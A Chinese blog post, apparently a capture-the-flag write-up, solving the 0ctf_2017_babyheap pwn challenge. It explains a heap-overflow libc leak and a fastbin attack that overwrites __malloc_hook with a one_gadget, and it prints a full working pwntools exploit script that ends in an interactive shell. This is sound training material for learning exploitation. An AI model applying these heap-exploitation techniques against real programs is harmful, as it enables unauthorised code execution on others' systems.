BUUCTF 0ctf_2017_babyheap

最新推荐文章于 2023-02-18 21:00:43 发布
最新推荐文章于 2023-02-18 21:00:43 发布
阅读量206 收藏
点赞数 1
分类专栏: PWN 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/122935880
版权

简单说一下这个题目的思路:

1.泄露libc:

编辑chunk的时候存在堆溢出,可以通过堆溢出,修改两个不同的指针,指向同一个chunk,随后free掉其中一个,即可dump其中内存,main_arena的地址。
 

2.同样再次利用堆溢出,修改其中一个chunk的fd指针为__malloc_hook,然后修改malloc_hook为one_gadget。

这里解答一个疑惑,为什么不写got表?
1,首先 RELRO保护全开,是不可写的。

2,其次,bss段上很难找到数据通过size检查。

完整exp:

from pwn import *
# p = remote("node4.buuoj.cn",26739)
p = process("./0ctf_2017_babyheap")
e = ELF("./0ctf_2017_babyheap")
libc = ELF("libc-2.23.so")
context.log_level = "debug"

def add(size):
	p.recvuntil("Command: ")
	p.sendline("1")
	p.recvuntil("Size: ")
	p.sendline(str(size))
def fill(index,size,content):
	p.recvuntil("Command: ")
	p.sendline("2")
	p.recvuntil("Index: ")
	p.sendline(str(index))
	p.recvuntil("Size: ")
	p.sendline(str(size))
	p.recvuntil("Content: ")
	p.send(str(content))
def  dump(index):
	p.recvuntil("Command: ")
	p.sendline("4")
	p.recvuntil("Index: ")
	p.sendline(str(index))
def free(index):
	p.recvuntil("Command: ")
	p.sendline("3")
	p.recvuntil("Index: ")
	p.sendline(str(index))

def dbg():
	gdb.attach(p)
	pause()

add(0x10)#0
add(0x10)#1
add(0x10)#2
add(0x10)#3
add(0x80)#4
add(0x10)#5
free(2)
free(1)
pl1 = '\x00'*(0x10) + p64(0) + p64(0x21) + '\x80'
fill(0,len(pl1),pl1)
pl2 = "a"*(0x10+8) + p64(0x21)
fill(3,len(pl2),pl2)
add(0x10)
add(0x10)
pl3 = 'a'*(0x10+8) + p64(0x91) 
fill(3,len(pl3),pl3)
free(4)
dump(2)

arena_addr = u64(p.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
libc_base = arena_addr - (0x3c4b20+88)
log.success("arena_addr: "+hex(arena_addr))
log.success("libc_base:"+hex(libc_base))
malloc_hook = libc_base + libc.sym["__malloc_hook"]
log.success("hook_addr:"+hex(malloc_hook))
add(0x60)

free(4)
fd = malloc_hook - 0x23
fake_chunk = p64(fd)
fill(2,len(fake_chunk),fake_chunk)

add(0x60)
add(0x60)
onegadget = libc_base + 0x4526a
pl4 = 'a'*(0x13) + p64(onegadget)
fill(6,len(pl4),pl4)
add(0x100)
p.interactive()

cut_maize
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0ctf Babyheap 2017
Bill
03-11 6359
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
babyheap_0ctf_2017
m0sway的博客
11-25 510
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
babyheap_0ctf_2017 详细解析【BUUCTF
qq_41696518的博客
09-06 2735
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3737
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
0ctf_2017_babyheap
u014377094的博客
03-10 457
本人double free+fastbin攻击第一道题,看了两天,好在理解下来不难。 参考传送门[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com 惯例checksec一下 打开ida 1创建chunk,按1,2依次创建,2往里写,3free掉指定数字chunk,4print出指定chunk内容 不建议跟ida里一些函数死磕,硬读会恶心到,理解就ok。 这里先放exp,读一遍exp咱们再来解释 from pwn import
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
0ctf_tctf_2018
05-16
0 CTF / TCTF 2018 0CTF / TCTF 2018决赛中的一些加密挑战
[BUUCTF]PWN——0ctf_2017_babyheap
mcmuyanga的博客
01-11 509
0ctf_2017_babyheap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 main函数 add() edit() delete() show() 利用思路 edit存在堆溢出,可以通过重叠堆来泄露libc 然后利用fastbin attack,修改malloc_hook为one_gadget 利用过程 首先来构造重叠堆 先申请3个chunk, add(0x10)#0 add(0x10)#1 add(0x80)#2 来看一
0ctf 2017 babyheap writeup
jmp esp
03-26 6271
前言坑比的我比赛的时候没有做。。第二天有课,赛后看了看,题目其实没啥太多难度,可能也就是细节上需要注意一下吧题目题目功能简单介绍一下题目功能,因为我本机是用的linux,ida在虚拟机里,ida的复制又不是特别方便,所以我就不复制分析的情况了,具体分析自己做一下练习一下也比较好,就把大致的情况说明一下。首先是主菜单===== Baby Heap in 2017 ===== 1. Allocate 2
babyheap_0ctf_2017 详解
Bi0x的博客
11-24 1605
题目地址: https://buuoj.cn/challenges#babyheap_0ctf_2017 本题为 64 位,以下内容以64位为例 信息收集 弄到题目文件先 checksec 保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数 先逆向一下文件,对于 main 函数大概的构造情况如下 对于 allocate 函数,里面用户输入 size 后根据其大小进行内存分配 这里使用了 calloc函数,其与malloc不同的是分配内存后会把数据.
0ctf2017 babyheap
pondzhang的专栏
12-06 157
from pwn import * #p = process(['./0ctf_2017_babyheap'],env={"LD_PRELOAD":"./libc-2.23.so"}) p = remote("node3.buuoj.cn",26165) elf = ELF('./0ctf_2017_babyheap') libc = ELF("./libc-2.23.so") def Allocate(size): p.recvuntil('Command: ') p.sendl.
0ctfbabyheap2017WP——堆溢出fastbin attack初探
GeekCmore的博客
02-18 459
从栈溢出进入堆溢出,漏洞利用的复杂度上了一个大台阶,主要是因为 ptmalloc 内存管理器对于堆管理设计了复杂的数据结构和算法,要想进入堆溢出的学习,就必须厘清它们之间的关系。本文将从一个经典的例子——0ctfbabyheap2017 来介绍一个初级的 fastbin attack 以初探堆溢出攻击。
绝对详细的babyheap_0ctf_2017题解
xieyichensss的博客
04-24 994
这是我第一次做堆题,其他师傅的wp都看了一个周左右,才把大概所有我不明白的地方搞懂。 直接上其他师傅的exp,然后逐步分析叭。(希望我尽快可以自己做堆) from pwn_debug import * pdbg = pwn_debug(‘babyheap_0ctf_2017’) pdbg.remote(‘node3.buuoj.cn’,26076) p = pdbg.run(‘remote’) def allocate(size): p.recvuntil('Command: ') p.sendline(‘
【堆溢出】babyheap_0ctf_2017
huzai9527的博客
03-14 298
堆溢出 创建3个chunk 修改chunk1 head 将fake chunk 尾部造假的chunk head 释放chunk1 即fake chunk 再申请和fake chunk一样大小的chunk 还原chunk2 的头部 申请chunk3, 防止释放chunk2 后,合并到top chunk free chunk2 泄露main_area的地址 ​ 这里泄露的是main_arena+88 的地址 ​ 这里得到mian_arena的实际地址 ​
x_ctf_b0verfl0w
10-22
x_ctf_b0verfl0w是一道栈溢出的题目,需要利用栈溢出漏洞来实现攻击。攻击者需要构造一个ROP链,通过泄露puts函数的地址,计算出libc的基地址,然后再通过libc中的system函数和/bin/sh字符串的地址来执行系统命令。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值